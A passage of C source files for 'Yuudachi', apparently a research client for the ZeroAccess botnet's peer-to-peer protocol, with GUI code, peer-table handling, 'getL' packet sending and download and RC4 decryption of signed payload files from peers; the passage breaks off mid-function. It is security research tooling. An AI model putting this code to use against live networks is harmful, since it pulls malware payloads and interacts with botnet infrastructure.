LVIF_TEXT;\n\tlvitem.iSubItem = 1;\n\tlvitem.pszText = lpValue;\n\tlvitem.iItem = index;\n\tListView_SetItem(g_guictx.OutputWindow, &lvitem);\n\n\tRtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n\t_strcpy(szBuffer, TEXT(\"TotalEvents: \"));\n\tultostr(ListView_GetItemCount(g_guictx.OutputWindow), _strend(szBuffer));\n\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)0, (LPARAM)&szBuffer);\n\n\tif (pCtx) {\n\t\t_strcpy(szBuffer, TEXT(\"Peers: \"));\t\n\t\tn = RtlNumberGenericTableElementsAvl(&pCtx->PeersTable);\n\t\tultostr(n, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)1, (LPARAM)&szBuffer);\n\n\t\t_strcpy(szBuffer, TEXT(\"Peers in dump: \"));\n\t\tn = RtlNumberGenericTableElementsAvl(&pCtx->PeersTableDump);\n\t\tultostr(n, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)2, (LPARAM)&szBuffer);\n\n\t\t_strcpy(szBuffer, TEXT(\"Files: \"));\n\t\tultostr(pCtx->NumberOfFiles, _strend(szBuffer));\n\t\tSendMessage(g_guictx.StatusBar, SB_SETTEXT, (WPARAM)3, (LPARAM)&szBuffer);\n\t}\n\tListView_RedrawItems(g_guictx.OutputWindow, ListView_GetItemCount(g_guictx.OutputWindow), -1);\n\tUpdateWindow(g_guictx.OutputWindow);\n}\n\n/*\n* SfUIMainWindowResize\n*\n* Purpose:\n*\n* Main window WM_SIZE handler.\n*\n*/\nVOID SfUIMainWindowResize(\n\tVOID\n\t)\n{\n\tRECT r1, StatusBarRect;\n\tLONG sizeY;\n\n\tSendMessage(g_guictx.StatusBar, WM_SIZE, 0, 0);\n\n\tRtlSecureZeroMemory(&StatusBarRect, sizeof(StatusBarRect));\n\tGetWindowRect(g_guictx.StatusBar, &StatusBarRect);\n\n\tif (g_guictx.OutputWindow) {\n\n\t\tRtlSecureZeroMemory(&r1, sizeof(r1));\n\t\tGetClientRect(g_guictx.MainWindow, &r1);\n\n\t\tsizeY = StatusBarRect.bottom - StatusBarRect.top;\n\n\t\tSetWindowPos(g_guictx.OutputWindow, NULL, 0, 0,\n\t\t\tr1.right,\n\t\t\tr1.bottom - sizeY,\n\t\t\tSWP_NOMOVE | SWP_NOZORDER);\n\t}\n}\n\n/*\n* SfUIMainWindowProc\n*\n* Purpose:\n*\n* Main window message handler.\n*\n*/\nLRESULT CALLBACK SfUIMainWindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)\n{\n\tswitch (uMsg) {\n\n\tcase WM_GETMINMAXINFO:\n\t\tif (lParam) {\n\t\t\t((PMINMAXINFO)lParam)->ptMinTrackSize.x = 400;\n\t\t\t((PMINMAXINFO)lParam)->ptMinTrackSize.y = 256;\n\t\t}\n\t\tbreak;\n\n\tcase WM_SIZE:\n\t\tif (!IsIconic(hwnd)) {\n\t\t\tSfUIMainWindowResize();\n\t\t}\n\t\tbreak;\n\n\tcase WM_CLOSE:\n\t\tInterlockedExchange((PLONG)&g_guictx.bShutdown, (LONG)TRUE);\n\t\tPostQuitMessage(0);\n\t\tbreak;\n\n\tdefault:\n\t\tbreak;\n\t}\n\treturn DefWindowProc(hwnd, uMsg, wParam, lParam);\n}\n\n/*\n* SfUICreateControls\n*\n* Purpose:\n*\n* Initialize gui controls.\n*\n*/\nvoid SfUICreateControls(\n\tHWND hwndParent\n\t)\n{\n\tLVCOLUMNW col;\n\tINT status_parts[5];\n\tRECT client_rect;\n\n\tGetClientRect(g_guictx.MainWindow, &client_rect);\n\n\tg_guictx.StatusBar = CreateWindowEx(0, STATUSCLASSNAME, NULL,\n\t\tWS_VISIBLE | WS_CHILD | SBARS_SIZEGRIP, 0, \n\t\tclient_rect.bottom - client_rect.top - 20, \n\t\tclient_rect.right - client_rect.left, \n\t\t20, \n\t\tg_guictx.MainWindow, (HMENU)1001, g_guictx.hInstance, NULL);\n\n\tif (g_guictx.StatusBar) {\n\t\tstatus_parts[0] = 200;\n\t\tstatus_parts[1] = 400;\n\t\tstatus_parts[2] = 600;\n\t\tstatus_parts[3] = 700;\n\t\tstatus_parts[4] = -1;\n\t\tSendMessage(g_guictx.StatusBar, SB_SETPARTS, (WPARAM)4, (LPARAM)&status_parts);\n\t}\n\n\tg_guictx.OutputWindow = CreateWindowEx(\n\t\t0,\n\t\tWC_LISTVIEW,\n\t\tNULL, \n\t\tWS_CHILD | WS_VISIBLE | LVS_REPORT | LVS_SINGLESEL,\n\t\t0, 0, 0, 0, \n\t\thwndParent,\n\t\t(HMENU)0, \n\t\t(HINSTANCE)g_guictx.hInstance,\n\t\tNULL);\n\n\n\tif (g_guictx.OutputWindow) {\n\n\t\tListView_SetExtendedListViewStyle(g_guictx.OutputWindow,\n\t\t\tLVS_EX_FULLROWSELECT | LVS_EX_DOUBLEBUFFER | LVS_EX_GRIDLINES | LVS_EX_LABELTIP);\n\n\t\tRtlSecureZeroMemory(&col, sizeof(col));\n\t\tcol.mask = LVCF_TEXT | LVCF_SUBITEM | LVCF_FMT | LVCF_WIDTH | LVCF_ORDER;\n\t\tcol.iSubItem = 1;\n\t\tcol.pszText = L\"Event\";\n\t\tcol.fmt = LVCFMT_LEFT;\n\t\tcol.iOrder = 0;\n\t\tcol.iImage = - 1;\n\t\tcol.cx = 120;\n\t\tListView_InsertColumn(g_guictx.OutputWindow, 1, &col);\n\n\t\tcol.iSubItem = 2;\n\t\tcol.pszText = L\"Value\";\n\t\tcol.iOrder = 1;\n\t\tcol.cx = 600;\n\t\tListView_InsertColumn(g_guictx.OutputWindow, 2, &col);\n\t}\n}\n\n/*\n* SfUImain\n*\n* Purpose:\n*\n* Create main window and all components.\n*\n*/\nvoid SfUImain(\n\tVOID\n\t)\n{\n\tMSG\t\t\t\t\t\tmsg1;\n\tWNDCLASSEX\t\t\t\twincls;\n\tBOOL\t\t\t\t\trv = TRUE, cond = FALSE;\n\tATOM\t\t\t\t\tclass_atom = 0;\n\tINITCOMMONCONTROLSEX icex;\n\n\tRtlSecureZeroMemory(&g_guictx, sizeof(g_guictx));\n\n\ticex.dwSize = sizeof(INITCOMMONCONTROLSEX);\n\ticex.dwICC = ICC_LISTVIEW_CLASSES | ICC_BAR_CLASSES;\n\tInitCommonControlsEx(&icex);\n\n\tg_guictx.hInstance = GetModuleHandle(NULL);\n\n\twincls.cbSize = sizeof(WNDCLASSEX);\n\twincls.style = 0;\n\twincls.lpfnWndProc = &SfUIMainWindowProc;\n\twincls.cbClsExtra = 0;\n\twincls.cbWndExtra = 0;\n\twincls.hInstance = g_guictx.hInstance;\n\twincls.hIcon = NULL;\n\twincls.hCursor = (HCURSOR)LoadImage(NULL, MAKEINTRESOURCE(OCR_NORMAL), IMAGE_CURSOR, 0, 0, LR_SHARED);\n\twincls.hbrBackground = 0;\n\twincls.lpszMenuName = NULL;\n\twincls.lpszClassName = T_SFMAINWNDCLASS;\n\twincls.hIconSm = 0;\n\t\n\tdo {\n\t\tclass_atom = RegisterClassEx(&wincls);\n\t\tif (class_atom == 0)\n\t\t\tbreak;\n\n\t\tg_guictx.MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom), T_SFWNDTITLE,\n\t\t\tWS_BORDER | WS_VISIBLE | WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 800, 600, NULL, NULL, g_guictx.hInstance, NULL);\n\n\t\tif (g_guictx.MainWindow == NULL)\n\t\t\tbreak;\n\n\t\tSfUICreateControls(g_guictx.MainWindow);\n\t\tSendMessage(g_guictx.MainWindow, WM_SIZE, 0, 0);\n\n\t\tSfNMain();\n\n\t\tdo {\n\t\t\trv = GetMessage(&msg1, NULL, 0, 0);\n\n\t\t\tif (rv == -1)\n\t\t\t\tbreak;\n\n\t\t\tif (IsDialogMessage(g_guictx.MainWindow, &msg1))\n\t\t\t\tcontinue;\n\n\t\t\tTranslateMessage(&msg1);\n\t\t\tDispatchMessage(&msg1);\n\t\t} while (rv != 0);\n\n\t} while (cond);\n\n\tif (class_atom != 0)\n\t\tUnregisterClass(MAKEINTATOM(class_atom), g_guictx.hInstance);\n}\n"
},
{
"path": "Source/Yuudachi/gui.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: GUI.H\n*\n* VERSION: 1.00\n*\n* DATE: 17 Jan 2016\n*\n* Yuudachi GUI support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct _ZA_GUI_CONTEXT {\n\tHINSTANCE hInstance;\n\tHWND MainWindow;\n\tHWND OutputWindow;\n\tHWND StatusBar;\n\tBOOL bShutdown;\n} ZA_GUI_CONTEXT, *PZA_GUI_CONTEXT;\n\nextern ZA_GUI_CONTEXT g_guictx;\n\n#define GUI_EVENT_ERROR 0\n#define GUI_EVENT_CONNECTION 1\n#define GUI_EVENT_PACKET_RECV 2\n#define GUI_EVENT_PACKET_SEND 3\n#define GUI_EVENT_DOWNLOAD_FILE 4\n#define GUI_EVENT_FILE_HEADER 5\n#define GUI_EVENT_PEER_HEADER 6\n#define GUI_EVENT_NEWROUND 7\n#define GUI_EVENT_PACKET_HEADER 8\n#define GUI_EVENT_INFORMATION 100\n#define GUI_EVENT_THREAD_STARTED 1000\n#define GUI_EVENT_THREAD_TERMINATED 2000\n\nvoid SfUImain(\n\tVOID\n\t);\n\nVOID SfUIAddEvent(\n\t_In_opt_ PVOID ScanContext,\n\t_In_ ULONG Event,\n\t_In_opt_ LPWSTR lpValue\n\t);\n"
},
{
"path": "Source/Yuudachi/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.00\n*\n* DATE: 17 Jan 2016\n*\n* Yuudachi program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"..\\shared\\global.h\"\n#include \"gui.h\"\n#include \"p2p.h\"\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Yuudachi main.\n*\n*/\nvoid SfMain(\n\tVOID\n\t)\n{\n\tWSADATA wsaData;\n\n\t__security_init_cookie();\n\n\tif (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {\n\t\tExitProcess((UINT)-1);\n\t}\n\t\n\tSfUImain();\n\n\tWSACleanup();\n\tExitProcess(0);\n}\n"
},
{
"path": "Source/Yuudachi/p2p.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: P2P.C\n*\n* VERSION: 1.01\n*\n* DATE: 22 Jan 2016\n*\n* Yuudachi poi2poi.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"p2p.h\"\n#include \"gui.h\"\n#include \"..\\shared\\za_crypto.h\"\n#include \"..\\shared\\ea.h\"\n\ntypedef void (__cdecl *pfnqsort)(\n\t_Inout_updates_bytes_(_NumOfElements * _SizeOfElements) void* _Base,\n\t_In_ size_t _NumOfElements,\n\t_In_ size_t _SizeOfElements,\n\t_In_ int(__cdecl* _PtFuncCompare)(void const*, void const*)\n\t);\n\nstatic ZA_SCANCTX g_zascan;\npfnqsort _qsort;\n\n/*\n* SfAvlCompareCallback\n*\n* Purpose:\n*\n* AVL table compare callback.\n*\n*/\nRTL_GENERIC_COMPARE_RESULTS NTAPI SfAvlCompareCallback(\n\t_In_ struct _RTL_AVL_TABLE *Table,\n\t_In_ PVOID FirstStruct,\n\t_In_ PVOID SecondStruct\n\t)\n{\n\tRTL_GENERIC_COMPARE_RESULTS res;\n\tZA_PEERINFO *Peer1 = (ZA_PEERINFO*)FirstStruct;\n\tZA_PEERINFO *Peer2 = (ZA_PEERINFO*)SecondStruct;\n\n\tUNREFERENCED_PARAMETER(Table);\n\n\tif ((Peer1->IP == Peer2->IP) && (Peer1->Port == Peer2->Port))\n\t\treturn GenericEqual;\n\n\tif (Peer1->IP > Peer2->IP)\n\t\tres = GenericGreaterThan;\n\telse\n\t\tres = GenericLessThan;\n\n\treturn res;\n}\n\n/*\n* SfAvlAllocateCallback\n*\n* Purpose:\n*\n* AVL table allocate memory callback.\n*\n*/\nPVOID NTAPI SfAvlAllocateCallback(\n\t_In_ struct _RTL_AVL_TABLE *Table,\n\t_In_ ULONG ByteSize\n\t)\n{\n\tUNREFERENCED_PARAMETER(Table);\n\treturn RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, ByteSize);\n}\n\n/*\n* SfAvlFreeCallback\n*\n* Purpose:\n*\n* AVL table free memory callback.\n*\n*/\nVOID NTAPI SfAvlFreeCallback(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ _Post_invalid_ PVOID Buffer\n\t)\n{\n\tUNREFERENCED_PARAMETER(Table);\n\tRtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);\n}\n\n/*\n* SfQSortCompare\n*\n* Purpose:\n*\n* qsort callback.\n*\n*/\nint __cdecl SfQSortCompare(\n\tvoid const* first,\n\tvoid const* second\n\t)\n{\n\tint i;\n\tZA_PEERINFO *Peer1 = (ZA_PEERINFO*)first;\n\tZA_PEERINFO *Peer2 = (ZA_PEERINFO*)second;\n\n\tif (Peer1->TimeStamp <= Peer2->TimeStamp)\n\t\ti = (Peer1->TimeStamp < Peer2->TimeStamp);\n\telse\n\t\ti = -1;\n\treturn i;\n}\n\n/*\n* SfNStoreFile\n*\n* Purpose:\n*\n* Save file in U directory and add EA for Harusame.\n*\n*/\nBOOL SfNStoreFile(\n\t_In_ ZA_SCANCTX *ScanContext,\n\t_In_ LPWSTR FileName,\n\t_In_ PVOID FileBuffer,\n\t_In_ ULONG FileSize,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL bResult = FALSE;\n\tHANDLE hFile;\n\tNTSTATUS status;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tUNICODE_STRING usName;\n\n\tRtlSecureZeroMemory(&usName, sizeof(usName));\n\tRtlInitUnicodeString(&usName, FileName);\n\tInitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, \n\t\tScanContext->RootDirectoryHandle, NULL);\n\n\tstatus = NtCreateFile(&hFile, FILE_GENERIC_WRITE, &ObjectAttributes,\n\t\t&IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF,\n\t\tFILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n\n\tif (NT_SUCCESS(status)) {\n\t\tif (NT_SUCCESS(NtWriteFile(hFile, NULL, NULL, NULL,\n\t\t\t&IoStatusBlock, FileBuffer, FileSize, NULL, NULL)))\n\t\t{\n\t\t\tbResult = SfNtfsSetFileHeaderToEa(hFile, FileHeader);\n\t\t}\n\t\tNtClose(hFile);\n\t}\n\treturn bResult;\n}\n\n/*\n* SfNDownloadFile\n*\n* Purpose:\n*\n* Download file from p2p network.\n*\n*/\nBOOL SfNDownloadFile(\n\t_In_ ZA_SCANCTX *ScanContext,\n\t_In_ ZA_FILEHEADER *FileHeader,\n\t_In_ ZA_PEERINFO *in_peer\n\t)\n{\n\tBOOL cond = FALSE, bResult = FALSE;\n\tSOCKET st = INVALID_SOCKET;\n\tstruct sockaddr_in io_addr;\n\tMD5_CTX ctx;\n\trc4_state rc4ctx;\n\tPBYTE recvbuffer = NULL;\n\tint recv_size;\n\tSIZE_T sz;\n\tWCHAR szText[MAX_PATH];\n\n\n\tdo {\n\t\tst = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\t\tif (st == INVALID_SOCKET)\n\t\t\tbreak;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons(TCP_PORT);\n\t\tif (bind(st, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0)\n\t\t\tbreak;\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\t\tio_addr.sin_port = htons((u_short)(P2P_UDP_PORT_ADJUST + in_peer->Port));\n\t\tio_addr.sin_addr.S_un.S_addr = in_peer->IP;\n\n\t\t_strcpy(szText, TEXT(\">>> trying connect to -> \"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t_strcat(szText, TEXT(\":\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\n\t\tif (connect(st, (struct sockaddr *)&io_addr, sizeof(io_addr)) != 0) {\n\t\t\t_strcpy(szText, TEXT(\">>> \"));\n\t\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t\t_strcat(szText, TEXT(\":\"));\n\t\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\t\t_strcat(szText, TEXT(\" <- connection attempt timed out\"));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\t\t\tbreak;\n\t\t}\n\n\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, TEXT(\">>> <- connected OK\"));\n\n\t\tsz = RECV_BUFFER_SIZE * 4;\n\t\trecvbuffer = NULL;\n\t\tNtAllocateVirtualMemory(NtCurrentProcess(), &recvbuffer, 0, &sz, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\t\tif (recvbuffer == NULL)\n\t\t\tbreak;\n\n\t\tsend(st, (const char *)FileHeader, 12, 0);\n\t\trecv_size = recv(st, (char *)recvbuffer, RECV_BUFFER_SIZE, 0);\n\n\t\tif (recv_size <= 0)\n\t\t\tbreak;\n\n\t\tif ((ULONG)recv_size < FileHeader->Size) {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, TEXT(\">>> received size is not equal to the header\"));\n\t\t\tbreak;\n\t\t}\n\n\t\tMD5Init(&ctx);\n\t\tMD5Update(&ctx, (const unsigned char *)FileHeader, 12);\n\t\tMD5Final(&ctx);\n\t\trc4_init(&rc4ctx, (const unsigned char *)&ctx.digest, sizeof(ctx.digest));\n\t\trc4_crypt(&rc4ctx, recvbuffer, recvbuffer, recv_size);\n\n\t\t_strcpy(szText, TEXT(\"U\\\\ip-\"));\n\t\tRtlIpv4AddressToStringW((const struct in_addr*)&io_addr.sin_addr, _strend(szText));\n\t\t_strcat(szText, TEXT(\"-port-\"));\n\t\tultostr(ntohs(io_addr.sin_port), _strend(szText));\n\t\t_strcat(szText, TEXT(\"-id-\"));\n\t\tultohex(FileHeader->Name, _strend(szText));\n#ifdef _WIN64\n\t\t_strcat(szText, TEXT(\"-64\"));\n#else\n\t\t_strcat(szText, TEXT(\"-32\"));\n#endif\n\t\t_strcat(szText, TEXT(\".bin\"));\n\n\t\tbResult = SfNStoreFile(ScanContext, szText, recvbuffer, recv_size, FileHeader);\n\n\t\tif (bResult) {\n\t\t\t_strcat(szText, TEXT(\" file saved OK\"));\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_DOWNLOAD_FILE, szText);\n\t\t}\n\t\telse {\n\t\t\tSfUIAddEvent(ScanContext, GUI_EVENT_ERROR, TEXT(\">>> error saving file\"));\n\t\t}\n\n\t} while (cond);\n\n\tif (recvbuffer != NULL) {\n\t\tsz = 0;\n\t\tNtFreeVirtualMemory(NtCurrentProcess(), &recvbuffer, &sz, MEM_RELEASE);\n\t}\n\n\tif (st != INVALID_SOCKET) {\n\t\tshutdown(st, SD_BOTH);\n\t\tclosesocket(st);\n\t}\n\n\treturn bResult;\n}\n\n/*\n* SfNAddFileHeader\n*\n* Purpose:\n*\n* Process file header, validate and download.\n*\n*/\nVOID SfNAddFileHeader(\n\t_In_ ZA_SCANCTX *ScanContext,\n\t_In_ ZA_FILEHEADER *hdr,\n\t_In_ ZA_PEERINFO *in_peer\n\t)\n{\n\tULONG\t c;\n\tWCHAR text[MAX_PATH]; \n\tLARGE_INTEGER ftime;\n\tSYSTEMTIME st1;\n\n\tif (ScanContext->NumberOfFiles >= MAXIMUM_FILES)\n\t\treturn;\n\n\tfor (c = 0; c < ScanContext->NumberOfFiles; c++) {\n\t\tif (memcmp(&ScanContext->FileHeaders[c], hdr, sizeof(ZA_FILEHEADER)) == 0) {\n#ifdef _DEBUG\t\t\n\t\t\tOutputDebugString(TEXT(\"Received file header already in the list\\r\\n\"));\n#endif\t\t\t\n\t\t\treturn;\n\t\t}\n\t}\n\n\t_strcpy(text, TEXT(\">> new file header received ->Name: \"));\n\tultohex(hdr->Name, _strend(text));\n\t_strcat(text, TEXT(\", TimeStamp: \"));\n\n\tRtlSecondsSince1980ToTime(hdr->Time, &ftime);\n\tif (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n\t\tultostr(st1.wDay, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wMonth, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wYear, _strend(text));\n\t\t_strcat(text, TEXT(\" \"));\n\t\tultostr(st1.wHour, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wMinute, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wSecond, _strend(text));\n\t}\n\telse {\n\t\tultohex(hdr->Time, _strend(text));\n\t}\n\t_strcat(text, TEXT(\", Size: \"));\n\tultostr(hdr->Size, _strend(text));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_FILE_HEADER, text);\n\n\t_strcpy(text, TEXT(\">> checking file header signature \"));\n\tif (SfcValidateFileHeader(ScanContext->CryptoProv, ScanContext->CryptoKey, hdr)) {\n\t\t_strcat(text, TEXT(\" -> verified OK, processing download\"));\n\t\tif (SfNDownloadFile(ScanContext, hdr, in_peer)) {\n\t\t\tRtlCopyMemory(&ScanContext->FileHeaders[ScanContext->NumberOfFiles], hdr, sizeof(ZA_FILEHEADER));\n\t\t\tScanContext->NumberOfFiles++;\n\t\t}\n\t}\n\telse {\n\t\t_strcat(text, TEXT(\" -> verification FAILED, file header tampered\"));\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_FILE_HEADER, text);\n}\n\n/*\n* SfNFormatPrintPeer\n*\n* Purpose:\n*\n* Output peer info to listview.\n*\n*/\nvoid SfNFormatPrintPeer(\n\tZA_SCANCTX *ScanContext, \n\tZA_PEERINFO *peer\n\t)\n{\n\tTCHAR\t\t\ttext[128];\n\tLARGE_INTEGER\tftime;\n\tSYSTEMTIME\t\tst1;\n\n\tRtlSecureZeroMemory(text, sizeof(text));\n\t_strcpy(text, TEXT(\">> peer record received ->\"));\n\tRtlIpv4AddressToStringW((const struct in_addr *)&peer->IP, _strend(text));\n\t_strcat(text, TEXT(\":\"));\n\t\n\tultostr(P2P_UDP_PORT_ADJUST + peer->Port, _strend(text));\n\t_strcat(text, TEXT(\" \"));\n\n\tRtlSecondsSince1980ToTime((peer->TimeStamp * 3600) - 0xbf000000, &ftime);\n\tRtlSecureZeroMemory(&st1, sizeof(st1));\n\tif (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n\t\tultostr(st1.wDay, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wMonth, _strend(text));\n\t\t_strcat(text, TEXT(\"/\"));\n\t\tultostr(st1.wYear, _strend(text));\n\t\t_strcat(text, TEXT(\" \"));\n\t\tultostr(st1.wHour, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wMinute, _strend(text));\n\t\t_strcat(text, TEXT(\":\"));\n\t\tultostr(st1.wSecond, _strend(text));\n\t}\n\tSfUIAddEvent(ScanContext, GUI_EVENT_PEER_HEADER, text);\n}\n\n/*\n* SfNAddToTable\n*\n* Purpose:\n*\n* Insert new peer element to AVL tables.\n*\n*/\nVOID SfNAddToTable(\n\tZA_SCANCTX *ScanContext,\n\tZA_PEERINFO *peer\n\t)\n{\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tLARGE_INTEGER Position;\n\tZA_PEERINFO *LookupElement;\n\tBOOLEAN NewElement = FALSE;\n\n\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\t//add new element to table, check before if it already in\n\tLookupElement = RtlLookupElementGenericTableAvl(&ScanContext->PeersTable, (PVOID)peer);\n\tif (LookupElement == NULL) {\n\t\tRtlInsertElementGenericTableAvl(&ScanContext->PeersTable, peer, sizeof(ZA_PEERINFO), &NewElement);\n\t}\n\n#ifdef _DEBUG\n\telse {\n\t\tOutputDebugString(TEXT(\"Duplicate peer entry found\\r\\n\"));\n\t}\n#endif\n\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t//this is new element, collect it and send to listview\n\tRtlEnterCriticalSection(&ScanContext->csTableDumpLock);\n\tif (LookupElement == NULL) {\n\n\t\tLookupElement = RtlLookupElementGenericTableAvl(&ScanContext->PeersTableDump, (PVOID)peer);\n\t\tif (LookupElement == NULL) {\n\t\t\tRtlInsertElementGenericTableAvl(&ScanContext->PeersTableDump, peer, sizeof(ZA_PEERINFO), &NewElement);\n\n\t\t\tPosition.LowPart = FILE_WRITE_TO_END_OF_FILE;\n\t\t\tPosition.HighPart = -1;\n\t\t\tif (NT_SUCCESS(NtWriteFile(ScanContext->DumpFileHandle, 0, NULL, NULL,\n\t\t\t\t&IoStatusBlock, peer, sizeof(ZA_PEERINFO), &Position, NULL)))\n\t\t\t{\n\t\t\t\tNtFlushBuffersFile(ScanContext->DumpFileHandle, &IoStatusBlock);\n\t\t\t}\n\t\t\tSfNFormatPrintPeer(ScanContext, peer);\n\t\t}\n#ifdef _DEBUG\n\t\telse {\n\t\t\tOutputDebugString(TEXT(\"Duplicate peer entry in dump found\\r\\n\"));\n\t\t}\n#endif\n\t}\n\tRtlLeaveCriticalSection(&ScanContext->csTableDumpLock);\n}\n\n/*\n* SfNgetLSender\n*\n* Purpose:\n*\n* getL processing thread.\n*\n*/\nDWORD WINAPI SfNgetLSender(\n\t_In_ PZA_SCANCTX ScanContext\n\t)\n{\n\tTCHAR\t\t\t\ttextbuf[256];\n\tstruct sockaddr_in\tio_addr;\n\tULONG\t\t\t\tc = 0, n = 0;\n\tZA_PACKETHEADER\t\tpacket;\n\tUSHORT port;\n\tZA_PEERINFO *TableEntry;\n\tZA_PEERINFO *CurrentState;\n\tSIZE_T memIO;\n\n\tRtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n\t_strcpy(textbuf, TEXT(\"> getL thread started, sid=0x\"));\n\tultohex(ScanContext->SessionId, _strend(textbuf));\n\tSfUIAddEvent(ScanContext, GUI_EVENT_THREAD_STARTED, textbuf);\n\n\tRtlEnterCriticalSection(&ScanContext->csTableLock);\n\n\tn = RtlNumberGenericTableElementsAvl(&ScanContext->PeersTable);\n\n\tmemIO = n * sizeof(ZA_PEERINFO);\n\tCurrentState = NULL;\n\tNtAllocateVirtualMemory(NtCurrentProcess(), &CurrentState, 0, &memIO, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\n\tif (CurrentState) {\n\n\t\tRtlSecureZeroMemory(CurrentState, memIO);\n\n\t\tfor (\n\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, TRUE), c = 0;\n\t\t\tTableEntry != NULL;\n\t\t\tTableEntry = RtlEnumerateGenericTableAvl(&ScanContext->PeersTable, FALSE), c += 1)\n\t\t{\n\t\t\tRtlCopyMemory(&CurrentState[c], TableEntry, sizeof(ZA_PEERINFO));\n\t\t}\n\n\t}\n\tRtlLeaveCriticalSection(&ScanContext->csTableLock);\n\n\t//memory error\n\tif (CurrentState == NULL)\n\t\treturn (DWORD)-1;\n\n\tc = 0;\n\t_qsort(CurrentState, n, sizeof(ZA_PEERINFO), &SfQSortCompare);\n\n\twhile (!g_guictx.bShutdown) {\n\n\t\tRtlSecureZeroMemory(&io_addr, sizeof(io_addr));\n\t\tio_addr.sin_family = AF_INET;\n\n\t\tport = (USHORT)(P2P_UDP_PORT_ADJUST + CurrentState[c].Port);\n\t\t\n\t\tio_addr.sin_port = htons((u_short)port);\n\t\tio_addr.sin_addr.S_un.S_addr = CurrentState[c].IP;\n\n\t\tpacket.CRC = 0;\n\t\tpacket.Command = 'getL';\n\t\tpacket.SessionID = ScanContext->SessionId;\n\t\tpacket.Opt1 = 0x0000;\n\t\tpacket.Opt2 = c & 0x3ff;\n\t\tpacket.CRC = RtlComputeCrc32(0, (PUCHAR)&packet, 